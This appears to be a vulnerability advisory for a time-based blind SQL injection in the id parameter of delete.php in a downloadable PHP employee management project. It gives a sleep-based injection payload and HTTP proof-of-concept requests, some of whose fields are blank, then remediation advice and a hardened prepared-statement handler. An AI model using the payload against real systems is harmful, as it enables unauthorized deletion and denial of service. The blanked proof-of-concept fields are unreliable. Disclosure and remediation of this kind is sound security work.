# EMPLOYEE_MANAGEMENT_SYSTEM 370project/delete.php SQL Injection Vulnerability

## Vulnerability Overview

- **Vulnerability Type**: SQL Injection (Time-based Blind SQL Injection)
- **Vulnerable File**: `370project/delete.php`
- **Vulnerable Parameter**: The `id` parameter is retrieved directly from the URL and concatenated into the DELETE statement without parameterization.

## Impact Scope

- Manipulation of database queries (unauthorized data modification/deletion, depending on database privileges)
- Inference of database behavior/data via blind injection techniques
- Reduction of availability by forcing expensive delayed database operations

## Exploit Code (Payload)

```sql
(select*from(select(sleep(10))union/**/select(1))a)
```

## POC Verification

**Normal Request (Baseline):**

```http
GET /delete.php?id=101 HTTP/1.1
Host: 370project:82
Accept: text/html
Connection: close
```

**Delayed Verification Request (URL-encoded):**

```http
GET /delete.php?id= HTTP/1.1
Host: 370project:82
Accept: text/html
Connection: close
```

**Expected Result**: The verification request should respond approximately `` seconds slower than the baseline request, indicating that malicious input has been injected.

## Remediation

- Use parameterized queries (prepared statements) instead of string concatenation
- Strictly validate and filter input parameters
- Use an ORM framework or database abstraction layer

## Source Code Download

https://code-projects.org/employee-management-system-in-php-with-source-code/
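
The first two remediation items above (a prepared statement plus strict validation of `id`), shown as an added PHP example that is not the project's own code. The table name `employee`, column `id`, connection credentials and response messages are assumptions, since the page does not show the original source.

```php
<?php
// Added example: hardened delete handler (requires PHP 8.0+).
// Table/column names and credentials are assumed placeholders.
declare(strict_types=1);

// Make mysqli throw exceptions instead of failing silently.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Accept only plain decimal digits; return a positive integer or null.
 * Anything containing SQL syntax (parentheses, spaces, comments) is rejected
 * before a database connection is even opened.
 */
function parse_employee_id(mixed $raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 10) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

/** Delete one row; returns the number of rows removed (0 or 1). */
function delete_employee(mysqli $db, int $id): int
{
    // The value is bound as an integer and never becomes part of the SQL text.
    $stmt = $db->prepare('DELETE FROM employee WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $affected = $stmt->affected_rows;
    $stmt->close();
    return $affected;
}

$id = parse_employee_id($_GET['id'] ?? null);
if ($id === null) {
    http_response_code(400);
    exit('Invalid id');
}

// Placeholder credentials; use an account limited to the privileges this page needs.
$db = new mysqli('localhost', 'app_user', 'app_password', 'employee_db');
$db->set_charset('utf8mb4');

$deleted = delete_employee($db, $id);
http_response_code($deleted === 1 ? 200 : 404);
echo $deleted === 1 ? 'Deleted' : 'No such record';
```

With this handler, the baseline and verification requests should return in comparable time, because a non-numeric `id` is rejected with a 400 response before any query runs.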